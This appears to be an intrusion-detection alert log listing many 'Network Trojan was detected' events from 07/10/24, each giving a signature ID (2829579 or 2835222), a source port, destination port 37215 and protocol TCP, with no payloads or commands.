                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.837917
                  SID:2829579
                  Source Port:57444
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.800070
                  SID:2829579
                  Source Port:32774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.536379
                  SID:2835222
                  Source Port:50222
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.957871
                  SID:2829579
                  Source Port:33490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.111438
                  SID:2835222
                  Source Port:57142
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.299377
                  SID:2835222
                  Source Port:59068
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.126116
                  SID:2829579
                  Source Port:47554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.789175
                  SID:2829579
                  Source Port:42216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.766848
                  SID:2835222
                  Source Port:55510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.290349
                  SID:2835222
                  Source Port:49682
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.454516
                  SID:2829579
                  Source Port:46420
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.723729
                  SID:2829579
                  Source Port:34696
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.376718
                  SID:2835222
                  Source Port:43250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.553741
                  SID:2829579
                  Source Port:51106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.661764
                  SID:2829579
                  Source Port:51030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.347149
                  SID:2835222
                  Source Port:50964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.652814
                  SID:2829579
                  Source Port:57584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.742007
                  SID:2829579
                  Source Port:54058
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.966709
                  SID:2829579
                  Source Port:59708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.499663
                  SID:2829579
                  Source Port:42426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.744023
                  SID:2829579
                  Source Port:47388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.707139
                  SID:2829579
                  Source Port:59894
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.881196
                  SID:2835222
                  Source Port:37672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.431094
                  SID:2835222
                  Source Port:48880
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.880984
                  SID:2835222
                  Source Port:47440
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.638729
                  SID:2835222
                  Source Port:37254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.488855
                  SID:2835222
                  Source Port:36496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231407
                  SID:2835222
                  Source Port:41174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.660601
                  SID:2829579
                  Source Port:57660
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.253247
                  SID:2835222
                  Source Port:32770
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.085141
                  SID:2835222
                  Source Port:59866
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.525491
                  SID:2835222
                  Source Port:54082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.587895
                  SID:2829579
                  Source Port:51536
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.883547
                  SID:2829579
                  Source Port:33664
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.822154
                  SID:2829579
                  Source Port:51426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.866986
                  SID:2835222
                  Source Port:47606
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.822075
                  SID:2829579
                  Source Port:43216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.451906
                  SID:2835222
                  Source Port:46884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.352801
                  SID:2835222
                  Source Port:48514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.921267
                  SID:2835222
                  Source Port:59376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.621432
                  SID:2835222
                  Source Port:57332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281648
                  SID:2829579
                  Source Port:38000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.176057
                  SID:2829579
                  Source Port:39352
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.968527
                  SID:2829579
                  Source Port:35108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.126957
                  SID:2835222
                  Source Port:47190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.321754
                  SID:2835222
                  Source Port:43334
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.268885
                  SID:2835222
                  Source Port:57386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.285425
                  SID:2835222
                  Source Port:38052
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.622181
                  SID:2829579
                  Source Port:58548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.420785
                  SID:2835222
                  Source Port:52154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.822276
                  SID:2829579
                  Source Port:51742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.623347
                  SID:2829579
                  Source Port:53166
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.077820
                  SID:2829579
                  Source Port:54318
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.843143
                  SID:2829579
                  Source Port:51868
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.454696
                  SID:2829579
                  Source Port:58526
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.892179
                  SID:2829579
                  Source Port:34128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.040022
                  SID:2829579
                  Source Port:35210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.658230
                  SID:2829579
                  Source Port:40568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.816955
                  SID:2835222
                  Source Port:59304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.804395
                  SID:2829579
                  Source Port:49666
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.379647
                  SID:2829579
                  Source Port:49390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.121414
                  SID:2835222
                  Source Port:38798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.564654
                  SID:2829579
                  Source Port:36552
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.196172
                  SID:2829579
                  Source Port:51786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.360757
                  SID:2835222
                  Source Port:38680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231891
                  SID:2829579
                  Source Port:41070
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.677011
                  SID:2835222
                  Source Port:34050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.384814
                  SID:2835222
                  Source Port:38678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.420210
                  SID:2829579
                  Source Port:54192
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.839204
                  SID:2835222
                  Source Port:58128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131250
                  SID:2835222
                  Source Port:44574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.166919
                  SID:2829579
                  Source Port:54634
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.849464
                  SID:2835222
                  Source Port:51742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:03.002542
                  SID:2835222
                  Source Port:40648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.949781
                  SID:2829579
                  Source Port:52320
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.999763
                  SID:2835222
                  Source Port:42704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019477
                  SID:2835222
                  Source Port:57292
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.892178
                  SID:2829579
                  Source Port:44404
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.663912
                  SID:2835222
                  Source Port:46244
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.862636
                  SID:2835222
                  Source Port:39992
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.967608
                  SID:2829579
                  Source Port:37962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.933427
                  SID:2835222
                  Source Port:46650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.679759
                  SID:2829579
                  Source Port:49692
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.428214
                  SID:2829579
                  Source Port:33774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.126416
                  SID:2829579
                  Source Port:52312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.822252
                  SID:2829579
                  Source Port:39846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.828285
                  SID:2835222
                  Source Port:46392
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.796224
                  SID:2835222
                  Source Port:37006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.320744
                  SID:2835222
                  Source Port:57064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.201787
                  SID:2835222
                  Source Port:43864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.457680
                  SID:2829579
                  Source Port:42930
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.557803
                  SID:2829579
                  Source Port:50716
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.675560
                  SID:2829579
                  Source Port:34336
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.856430
                  SID:2835222
                  Source Port:43376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.721350
                  SID:2829579
                  Source Port:48162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.481265
                  SID:2835222
                  Source Port:56250
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.763647
                  SID:2829579
                  Source Port:43846
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.115720
                  SID:2835222
                  Source Port:46108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.824004
                  SID:2835222
                  Source Port:53162
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.487811
                  SID:2829579
                  Source Port:38428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.466944
                  SID:2829579
                  Source Port:52016
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:44.495455
                  SID:2829579
                  Source Port:50026
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281648
                  SID:2835222
                  Source Port:44332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:02.853757
                  SID:2835222
                  Source Port:37584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.791726
                  SID:2829579
                  Source Port:35436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.313392
                  SID:2829579
                  Source Port:43348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.492853
                  SID:2829579
                  Source Port:54412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.398717
                  SID:2835222
                  Source Port:52492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.148886
                  SID:2829579
                  Source Port:32798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.480250
                  SID:2835222
                  Source Port:49786
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.090625
                  SID:2829579
                  Source Port:34916
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.792621
                  SID:2829579
                  Source Port:38210
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.993210
                  SID:2829579
                  Source Port:51830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.841938
                  SID:2835222
                  Source Port:38594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.635714
                  SID:2829579
                  Source Port:35388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169904
                  SID:2829579
                  Source Port:56994
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.880564
                  SID:2835222
                  Source Port:48316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.468391
                  SID:2829579
                  Source Port:43604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.294110
                  SID:2835222
                  Source Port:55540
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.020582
                  SID:2835222
                  Source Port:41482
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.789331
                  SID:2829579
                  Source Port:45452
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.591282
                  SID:2829579
                  Source Port:33944
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629470
                  SID:2835222
                  Source Port:48372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.163791
                  SID:2829579
                  Source Port:48610
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.402318
                  SID:2829579
                  Source Port:36370
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.426350
                  SID:2829579
                  Source Port:39322
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.679549
                  SID:2829579
                  Source Port:60284
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.594914
                  SID:2829579
                  Source Port:39670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.855576
                  SID:2829579
                  Source Port:48960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.641843
                  SID:2829579
                  Source Port:45458
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.010263
                  SID:2829579
                  Source Port:54416
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.792778
                  SID:2835222
                  Source Port:47388
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.516859
                  SID:2835222
                  Source Port:34006
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.421607
                  SID:2835222
                  Source Port:51056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.474550
                  SID:2835222
                  Source Port:49278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.920264
                  SID:2829579
                  Source Port:43920
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.239188
                  SID:2835222
                  Source Port:57326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.091554
                  SID:2829579
                  Source Port:33704
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.223623
                  SID:2835222
                  Source Port:52680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.998541
                  SID:2835222
                  Source Port:41040
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.264352
                  SID:2835222
                  Source Port:38436
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.652077
                  SID:2835222
                  Source Port:35590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.378421
                  SID:2829579
                  Source Port:58030
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.428275
                  SID:2835222
                  Source Port:50626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.583126
                  SID:2835222
                  Source Port:43706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.867359
                  SID:2829579
                  Source Port:44200
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.689039
                  SID:2835222
                  Source Port:55496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169608
                  SID:2835222
                  Source Port:51400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.786219
                  SID:2829579
                  Source Port:56488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.970105
                  SID:2829579
                  Source Port:47180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.080218
                  SID:2829579
                  Source Port:50900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.941322
                  SID:2829579
                  Source Port:44414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.505741
                  SID:2835222
                  Source Port:55072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.378421
                  SID:2829579
                  Source Port:39972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.812623
                  SID:2829579
                  Source Port:50884
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.757795
                  SID:2835222
                  Source Port:52448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.459998
                  SID:2829579
                  Source Port:49414
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.921577
                  SID:2829579
                  Source Port:59280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.108861
                  SID:2829579
                  Source Port:43480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.478024
                  SID:2835222
                  Source Port:32962
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.883458
                  SID:2835222
                  Source Port:50978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.853234
                  SID:2835222
                  Source Port:42382
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.356942
                  SID:2835222
                  Source Port:46620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.602329
                  SID:2835222
                  Source Port:47254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.302858
                  SID:2835222
                  Source Port:43870
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.916413
                  SID:2829579
                  Source Port:58478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.285937
                  SID:2829579
                  Source Port:44584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.636807
                  SID:2835222
                  Source Port:59170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.874901
                  SID:2835222
                  Source Port:49304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.433410
                  SID:2829579
                  Source Port:50242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.791528
                  SID:2835222
                  Source Port:38028
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.785439
                  SID:2829579
                  Source Port:33926
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.209381
                  SID:2835222
                  Source Port:58876
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.761249
                  SID:2835222
                  Source Port:41428
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.836965
                  SID:2829579
                  Source Port:36272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.548548
                  SID:2835222
                  Source Port:42644
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.562262
                  SID:2829579
                  Source Port:34656
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.037222
                  SID:2835222
                  Source Port:40636
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.177651
                  SID:2835222
                  Source Port:50170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.623094
                  SID:2829579
                  Source Port:48456
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.066216
                  SID:2835222
                  Source Port:45402
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.925907
                  SID:2829579
                  Source Port:58044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.515486
                  SID:2835222
                  Source Port:55466
                  Destination Port:37215
